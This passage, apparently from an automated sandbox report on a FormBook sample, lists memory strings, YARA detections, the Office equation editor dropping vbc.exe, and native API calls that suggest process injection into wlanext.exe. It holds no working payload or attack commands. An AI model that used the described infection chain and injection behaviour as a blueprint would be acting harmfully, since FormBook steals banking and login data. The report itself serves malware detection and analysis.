          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2212012859.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181D0 NtCreateFile,7_2_004181D0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418280 NtReadFile,7_2_00418280
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418300 NtClose,7_2_00418300
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004183B0 NtAllocateVirtualMemory,7_2_004183B0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181CB NtCreateFile,7_2_004181CB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041827B NtReadFile,7_2_0041827B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418222 NtReadFile,7_2_00418222
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004183AA NtAllocateVirtualMemory,7_2_004183AA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041842A NtAllocateVirtualMemory,7_2_0041842A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009200C4 NtCreateFile,LdrInitializeThunk,7_2_009200C4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00920048
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920078 NtResumeThread,LdrInitializeThunk,7_2_00920078
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009207AC NtCreateMutant,LdrInitializeThunk,7_2_009207AC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F9F0 NtClose,LdrInitializeThunk,7_2_0091F9F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F900 NtReadFile,LdrInitializeThunk,7_2_0091F900
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0091FAD0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0091FAE8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0091FBB8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0091FB68
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_0091FC90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0091FC60
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FD8C NtDelayExecution,LdrInitializeThunk,7_2_0091FD8C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0091FDC0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_0091FEA0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0091FED0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091FFB4 NtCreateSection,LdrInitializeThunk,7_2_0091FFB4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009210D0 NtOpenProcessToken,7_2_009210D0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00920060 NtQuerySection,7_2_00920060
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009201D4 NtSetValueKey,7_2_009201D4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092010C NtOpenDirectoryObject,7_2_0092010C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00921148 NtOpenThread,7_2_00921148
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0091F8CC NtWaitForSingleObject,7_2_0091F8CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020200C4 NtCreateFile,LdrInitializeThunk,9_2_020200C4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020207AC NtCreateMutant,LdrInitializeThunk,9_2_020207AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FAB8 NtQueryValueKey,LdrInitializeThunk,9_2_0201FAB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_0201FAD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_0201FAE8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FB50 NtCreateKey,LdrInitializeThunk,9_2_0201FB50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_0201FB68
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_0201FBB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F900 NtReadFile,LdrInitializeThunk,9_2_0201F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F9F0 NtClose,LdrInitializeThunk,9_2_0201F9F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_0201FED0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FFB4 NtCreateSection,LdrInitializeThunk,9_2_0201FFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC60 NtMapViewOfSection,LdrInitializeThunk,9_2_0201FC60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FD8C NtDelayExecution,LdrInitializeThunk,9_2_0201FD8C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_0201FDC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020048 NtProtectVirtualMemory,9_2_02020048
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020060 NtQuerySection,9_2_02020060
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020078 NtResumeThread,9_2_02020078
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020210D0 NtOpenProcessToken,9_2_020210D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202010C NtOpenDirectoryObject,9_2_0202010C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021148 NtOpenThread,9_2_02021148
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020201D4 NtSetValueKey,9_2_020201D4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FA20 NtQueryInformationFile,9_2_0201FA20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FA50 NtEnumerateValueKey,9_2_0201FA50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FBE8 NtQueryVirtualMemory,9_2_0201FBE8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F8CC NtWaitForSingleObject,9_2_0201F8CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021930 NtSetContextThread,9_2_02021930
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F938 NtWriteFile,9_2_0201F938
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FE24 NtWriteVirtualMemory,9_2_0201FE24
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FEA0 NtReadVirtualMemory,9_2_0201FEA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FF34 NtQueueApcThread,9_2_0201FF34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FFFC NtCreateProcessEx,9_2_0201FFFC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC30 NtOpenProcess,9_2_0201FC30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02020C40 NtGetContextThread,9_2_02020C40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC48 NtSetInformationFile,9_2_0201FC48
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FC90 NtUnmapViewOfSection,9_2_0201FC90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FD5C NtEnumerateKey,9_2_0201FD5C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021D80 NtSuspendThread,9_2_02021D80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D81D0 NtCreateFile,9_2_000D81D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D8280 NtReadFile,9_2_000D8280
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D8300 NtClose,9_2_000D8300
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D83B0 NtAllocateVirtualMemory,9_2_000D83B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D81CB NtCreateFile,9_2_000D81CB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D8222 NtReadFile,9_2_000D8222
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D827B NtReadFile,9_2_000D827B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D83AA NtAllocateVirtualMemory,9_2_000D83AA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D842A NtAllocateVirtualMemory,9_2_000D842A
          Source: new order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0202E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0209F970 appears 84 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0202DF5C appears 119 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 02073F92 appears 132 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0207373B appears 244 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0099F970 appears 49 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00973F92 appears 76 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0097373B appears 150 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092DF5C appears 74 times
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
